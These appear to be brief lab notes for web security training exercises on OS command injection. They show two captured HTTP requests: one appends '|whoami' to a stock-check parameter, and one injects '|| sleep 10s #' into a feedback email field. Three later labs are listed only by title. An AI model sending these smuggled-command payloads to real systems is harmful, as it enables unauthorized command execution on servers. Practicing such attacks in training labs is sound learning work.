labs
Lab - 1: OS command injection, simple case
POST /product/stock HTTP/1.1
...
Referer: https://0af300780436dfe1c01a0fcf00e500a9.web-security-academy.net/product?productId=1
...
productId=1&storeId=1|whoamiLab - 2: Blind OS command injection with time delays
POST /feedback/submit HTTP/1.1
...
Referer: https://0a80001303ab17adc04691580066009d.web-security-academy.net/feedback
...
csrf=CHt9Kb30ZQkTSwACtbyri7QdKYWVHre4&name=test&email=test%40gmail.com||+sleep+10s+#&subject=Test+subject&message=Test+messageLab - 3: Blind OS command injection with output redirection
Lab - 4: Blind OS command injection with out-of-band interaction
Lab - 5: Blind OS command injection with out-of-band data exfiltration
Last updated